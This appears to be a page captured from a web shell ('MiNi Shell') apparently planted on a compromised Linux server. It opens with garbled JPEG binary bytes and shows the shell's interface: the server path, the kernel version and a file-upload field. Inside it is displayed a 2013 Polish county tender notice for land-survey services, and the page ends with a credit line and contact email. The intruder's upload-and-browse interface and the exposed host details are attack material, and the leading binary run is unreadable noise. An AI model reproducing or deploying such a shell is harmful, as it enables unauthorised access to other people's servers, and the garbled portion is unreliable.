JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130222/75542-N-2013.html

<p class="kh_header"><b>Włodawa: Przetarg -wykonanie prac geodezyjnych</b><br>
<b>Numer ogłoszenia: 75542 - 2013; data zamieszczenia: 22.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu we Włodawie , al. Józefa Piłsudskiego 24, 22-200 Włodawa, woj. lubelskie, tel. 82 5721510, faks 82 5722444.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatwlodawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg -wykonanie prac geodezyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest wykonanie prac geodezyjnych związanych z wykonywaniem zadań rządowych w zakresie geodezji i kartografii, geodezji urządzeniowo - rolnej 
i gospodarki nieruchomościami oraz zadań związanych z działalnością Powiatu Włodawskiego.

Zakres prac obejmuje następujące rodzaje i przybliżone ilości prac:

1.pomiar działki wraz z ustaleniem jej stanu prawnego- 8 działek
2.ustalenie stanu prawnego działki z badaniem K W- 2 działki
3.ustalenie stanu prawnego działki i założenie KW - 6 działek
4.podział geodezyjny od nowo powstałej działki, w tym:
	a.z wyznaczeniem na gruncie palikami drewnianymi	-8 działek
	b.z wyznaczeniem na gruncie słupkami betonowymi	-2 działek
5.wznowienie granic działki od punktu,  przyjmując min. 4 pkt  działki, w tym:
	a.palikami drewnianymi	-20 punktów
	b.słupkami betonowymi 	-8 punktów
6.pomiary granic związane z kontrolą lub weryfikacją ewidencji gruntów i budynków	     - 5 działek
7.wydzielenie działki zabudowanej lub rolniczej dożywotniego użytkowania  	- 4 działki
8.aktualizacja ewidencji gruntów w zakresie użytków gruntowych  działek	         - 20 działek
  
9.aktualizacja ewidencji gruntów w zakresie gleboznaczej klasyfikacji gruntów działek o powierzchni do 1 ha	- 5 działek
10.aktualizacja ewidencji gruntów w zakresie gleboznaczej klasyfikacji gruntów działek o powierzchni powyżej 
1 ha -podając cenę za 1 ha	 - 10 ha

Uwaga: Zamawiający zastrzega, że ilości wskazane w specyfikacji są ilościami szacunkowymi, służącymi do oszacowania wartości zamówienia, skalkulowania ceny za poszczególne elementy zamówienia. Wykonawcy, z którym Zamawiający zawrze umowę nie przysługuje roszczenie 
o realizację usług w wielkościach podanych w SIWZ.
Rodzaj, ilość prac i termin ich realizacji Zamawiający określi w odrębnych zleceniach, których ilość zależeć będzie od potrzeb Zamawiającego.
Poszczególne prace zlecane sukcesywnie powinny być wykonane w okresie nie dłuższym niż 30 dni, od daty otrzymania zlecenia, z wyjątkiem podziałów wymagających zatwierdzenia decyzją, co wydłuża procedurę wykonania do 60 dni.  Termin wykonania zlecenia może 
w uzasadnionych przypadkach za zgodą Zamawiającego  ulec przedłużeniu o czas niezbędny do zakończenia wykonywania zlecenia w sposób należyty. Przedłużenie terminu  może jednak nastąpić wyłącznie na pisemny wniosek i za zgodą Zamawiającego.
Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami prawa.
Podczas wykonywania zamówienia obowiązywać będą przepisy techniczne i zalecenia podane w:
1)	Ustawie z dnia 17 maja 1989r. - Prawo geodezyjne i kartograficzne /tekst jednolity Dz. U.
 z 2010 r. Nr 193, poz. 1287 z późn. zm./;
2)	Rozporządzeniu Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001r. 
w sprawie ewidencji gruntów i budynków /Dz. U. Nr 38, poz. 454/;
3)	Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji oraz Rolnictwa 
i Gospodarki Żywnościowej z dnia 14 kwietnia 1999 r. w sprawie rozgraniczenia nieruchomości /Dz. U. Nr  45, poz. 453/;
4)	Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 24 marca 1999r. 
w sprawie standardów technicznych dotyczących geodezji, kartografii oraz krajowego systemu informacji o terenie - załączniki :
a)	Instrukcje techniczne: O-1 Ogólne zasady wykonywania prac geodezyjnych
i O-2 Ogólne zasady opracowania map dla celów gospodarczych, wprowadzone do stosowania zarządzeniem nr 1 Prezesa Głównego Urzędu Geodezji i Kartografii z dnia 
9 lutego 1979 r., zmienione zarządzeniem nr 4 Prezesa GUGiK z dnia 23 lipca 1983r. / Dz. Urz. GUGiK Nr 2, poz. 5/;
b)	Instrukcja techniczna O-3 Zasady kompletowania dokumentacji geodezyjnej 
i kartograficznej wprowadzona do stosowania zarządzeniem nr 1 Ministra Gospodarki Przestrzennej i Budownictwa z dnia 4 lutego 1992 r.
     c) Instrukcja techniczna G-1 Pozioma osnowa geodezyjna wprowadzona 
do stosowania zarządzeniem nr 4 Prezesa GUGiK z dnia 19 lutego 1979 r., zmieniona zarządzeniem nr 5 Prezesa GUGiK z dnia 23 lipca 1983 r. /Dz. Urz. GUGiK Nr 2, poz. 6/,
d) Instrukcją techniczną G-4 pomiary sytuacyjne i wysokościowe wprowadzona do stosowania zarządzeniem nr 7 Prezesa GUGiK z dnia 28 czerwca 1979 r., zmieniona zarządzeniem nr 7 Prezesa GUGiK z dnia 23 lipca 1983 r. /Dz. Urz. GUGiK Nr 2, poz.8/;
e) Instrukcją techniczną G-5 Ewidencja gruntów i budynków wprowadzona   
do stosowania zarządzeniem nr 16 Prezesa GUGiK z dnia 13 listopada 2003 r;
f) Instrukcją techniczną -K-1 Mapa zasadnicza- wprowadzona do stosowania zarządzeniem Prezesa GUGiK z dnia 9 lutego 1979r., zmieniona zarządzeniem nr 1 Prezesa GUGiK   
z dnia 24 lutego 1984r. /Dz. Urz. GUGiK nr 1, poz. 1/;
Instrukcją obsługi programu komputerowego GEO-MAP;
Instrukcją obsługi programu komputerowego EGB V;
Ustawie z dnia 21 marca 1985r. o drogach publicznych /tekst jednolity z 2000 r. Nr 71, poz. 838 z późn. zm./;
Ustawą z dnia 6 lipca 1982r. o księgach wieczystych i hipotece /tekst jednolity Dz. U. z 2001 r. Nr 124, poz. 1361 z późn. zm./;
Rozporządzeniu Ministra Gospodarki Komunalnej z dnia 25.06.1968r. w sprawie numeracji nieruchomości /Dz. U. Nr 23, poz. 151z późn. zm./;
1Rozporządzeniu Ministra Infrastruktury z dnia 30 lipca 2003r. w sprawie uprawnień zawodowych w dziedzinie geodezji i kartografii /Dz. U. Nr 143, poz. 1396/;
1Rozporządzeniu Rady Ministrów z dnia 7 grudnia 2004r. w sprawie sposobu 
i trybu dokonywania podziałów nieruchomości / Dz. U. Nr 268, poz. 2663/;
1Ustawa z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej ( Dz. U. Nr 76, poz. 489 z późn. zm.)
Rozporządzenie Rady Ministrów z dnia 12 września 2012r. w sprawie gleboznawczej klasy-fikacji gruntów (Dz.U z 2012 roku,  poz. 1246). 
Wykonawcy zgłaszający się do przetargu powinni posiadać odpowiednie  uprawnienia geodezyjne do wykonania wyżej wymienionych prac z zakre-su:
a)	Geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne;
b)	Rozgraniczenia i podziały nieruchomości (gruntów) oraz sporządzenie dokumentacji do celów rolnych i leśnych;
c)	Odpowiednie kwalifikacje do wykonywania klasyfikacji gruntów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.55.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub będzie dysponował w okresie wykonywania zamówienia: co najmniej 1 osobą posiadającą uprawnienia zawodowe w zakresie 1 i 2 zgodnie z art. 43 ustawy - Prawo geodezyjne 
i kartograficzne oraz 1 osobą posiadającą odpowiednie kwalifikacje do wykonywania klasyfikacji gruntów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Przed podpisaniem umowy Wykonawca przedstawi potwierdzone za zgodność z oryginałem kserokopie uprawnień zawodowych osób biorących udział w realizacji zamówienia oraz kserokopie upoważnienia  do wykonywania gleboznawczej klasyfikacji gruntów.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art.144 ust.1 ustawy i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie strony.
Zamawiający przewiduje możliwość dokonania zmian istotnych postanowień umowy 
w stosunku do treści oferty, na podstawie której dokonany zostanie wybór wykonawcy:
a)zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej takimi uprawnieniami, jakie wymagane były w SIWZ.
b)zmiany podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy na innego legitymującego się takimi samymi kwalifikacjami /doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego.
c)zmiany terminów wykonania zamówienia z przyczyn niezależnych od Zamawiającego oraz Wykonawcy. Termin wykonania umowy może wówczas ulec odpowiedniemu przedłużeniu 
o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty. Przedłużenie terminu nie może jednak przekraczać okresu trwania tej okoliczności.
Zamawiający dopuszcza zmianę wynagrodzenia tylko w następującym przypadku:
- zmiany stawki podatku VAT wynikającej z obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatwlodawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe 
                   Al. J. Piłsudskiego 24
                   22-200 Włodawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2013 godzina 10:00, miejsce: Starostwo Powiatowe 
                   Al. J. Piłsudskiego 24
                   22-200 Włodawa
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com